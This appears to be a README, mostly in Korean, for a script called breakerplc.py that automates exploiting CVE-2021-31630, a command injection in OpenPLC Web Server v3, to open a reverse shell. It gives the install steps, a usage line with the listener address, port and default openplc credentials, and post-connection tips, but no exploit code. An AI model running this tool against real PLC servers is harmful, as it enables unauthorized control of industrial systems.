
This is a automation of cve-2021-31630 exploitation
이 스크립트는 OpenPLC Web Server v3의 취약점을 자동으로 악용합니다.
수동 기술을 사용하지 않고 서버에서 자동 리버스 쉘을 생성할 수 있습니다.
CVE-2021-31630 상세 Open PLC Webserver v3의 명령 삽입 취약점으로 인해 원격 공격자가 애플리케이션의 "/hardware" 페이지에 있는 "Hardware Layer Code Box" 구성 요소를 통해 임의 코드를 실행할 수 있습니다.
이 스크립트는 OpenPLC에서 스크립트 등록을 완료한 후 동일한 터미널에서 머신의 쉘을 생성하도록 사용자 지정되었습니다.
아래 명령어를 사용하세요 (종속성을 설치하기 위해 Python 가상 환경을 생성하는 것이 좋습니다) # 단, breakerplc.py 스크립트는 가상 환경 외부에서 실행해야 합니다.
sudo apt update
pip3 install requests
사용 방법? 아래 명령줄을 사용할 수 있습니다.
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

중요
연결 후, 쉘을 반환하기 위해 코드 라인을 끊으려면 "whoami" 또는 "ls"를 입력해야 합니다.
